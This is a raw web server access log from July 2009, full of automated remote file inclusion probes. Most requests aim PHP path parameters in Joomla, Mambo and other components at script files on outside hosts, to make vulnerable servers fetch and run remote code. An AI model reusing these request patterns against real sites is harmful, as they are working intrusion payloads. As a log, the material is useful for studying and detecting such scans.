213.238.52.141 - - [06/Jul/2009:03:56:44 -0400] "GET //include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:56:44 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:56:44 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:56:47 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:56:47 -0400] "GET //include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:56:47 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:03:56:49 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:03:56:49 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:03:56:49 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:03:56:53 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:03:56:54 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
61.78.62.84 - - [06/Jul/2009:03:56:56 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:56:56 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:03:56:58 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:56:59 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:56:59 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:57:00 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:03:57:00 -0400] "GET //include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:57:03 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:03:57:04 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:57:06 -0400] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:57:06 -0400] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:03:57:06 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
213.238.52.141 - - [06/Jul/2009:03:57:07 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jul/2009:03:57:11 -0400] "GET /logs/error_log.Q109062300%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jul/2009:03:57:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.171.190.110 - - [06/Jul/2009:03:58:20 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:03:58:20 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:03:58:21 -0400] "GET /logs/access_log.Q109060200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:58:42 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:58:42 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:58:44 -0400] "GET //include/bbs.lib.inc.php?site_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:00:07 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:00:07 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:00:07 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:00:16 -0400] "GET /logs/access_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:00:39 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:00:39 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:00:39 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 225 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:00:44 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:04:03:02 -0400] "GET /logs//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:04:03:02 -0400] "GET /logs/access_log.Q109053000//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:04:03:02 -0400] "GET //logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.115.213.35 - - [06/Jul/2009:04:03:05 -0400] "GET /logs/access_log.Q109052500//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:03:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.245.146.253 - - [06/Jul/2009:04:04:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:04:04:01 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:04:04:04 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:04:07 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:04:07 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:04:42 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:04:04:42 -0400] "GET /logs/access_log.Q109052200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 254 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:04:04:59 -0400] "GET /logs/access_log.Q109060800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
190.248.10.179 - - [06/Jul/2009:04:04:59 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
190.248.10.179 - - [06/Jul/2009:04:04:59 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
190.248.10.179 - - [06/Jul/2009:04:05:27 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
218.249.36.194 - - [06/Jul/2009:04:05:46 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jul/2009:04:05:46 -0400] "GET /logs/access_log.Q109052000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:04:05:48 -0400] "GET /images/items/45417001_full.jpg HTTP/1.1" 200 11152 "-" "Googlebot-Image/1.0"
87.120.103.5 - - [06/Jul/2009:04:06:21 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
87.120.103.5 - - [06/Jul/2009:04:06:21 -0400] "GET /logs/access_log.Q109051300%20/e404.php?DOCUMENT_ROOT=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.120.103.5 - - [06/Jul/2009:04:06:21 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
213.238.52.141 - - [06/Jul/2009:04:06:42 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:04:06:50 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:00 -0400] "GET /logs/access_log.Q109060800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:00 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:03 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:03 -0400] "GET /logs/access_log.Q109060800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:03 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:04:07:11 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:04:07:11 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:04:07:11 -0400] "GET //modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
125.245.146.253 - - [06/Jul/2009:04:07:13 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:07:19 -0400] "GET /?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:07:19 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:07:19 -0400] "GET /logs/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:07:19 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:04:07:20 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
213.238.52.141 - - [06/Jul/2009:04:07:29 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:33 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:04:07:37 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:07:39 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:07:51 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:07:51 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:04:07:51 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:04:07:51 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
85.17.162.28 - - [06/Jul/2009:04:07:51 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:07:51 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:07:52 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:07:53 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:07:53 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
58.72.53.116 - - [06/Jul/2009:04:07:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.72.53.116 - - [06/Jul/2009:04:07:55 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.72.53.116 - - [06/Jul/2009:04:07:56 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:04:08:00 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
85.17.162.28 - - [06/Jul/2009:04:08:06 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:08:06 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:08:06 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:08:17 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:08:21 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:08:24 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:08:24 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 206 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:08:24 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:08:27 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
66.46.177.182 - - [06/Jul/2009:04:08:46 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
66.46.177.182 - - [06/Jul/2009:04:08:46 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
66.46.177.182 - - [06/Jul/2009:04:08:46 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
85.17.162.28 - - [06/Jul/2009:04:08:47 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.46.177.182 - - [06/Jul/2009:04:08:50 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.189.19.9 - - [06/Jul/2009:04:08:53 -0400] "GET /?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:08:53 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:08:53 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:08:53 -0400] "GET /logs/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:08:55 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:00 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:09:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.46.177.182 - - [06/Jul/2009:04:09:05 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.46.177.182 - - [06/Jul/2009:04:09:05 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.46.177.182 - - [06/Jul/2009:04:09:06 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.92.85.176 - - [06/Jul/2009:04:09:18 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:18 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:18 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
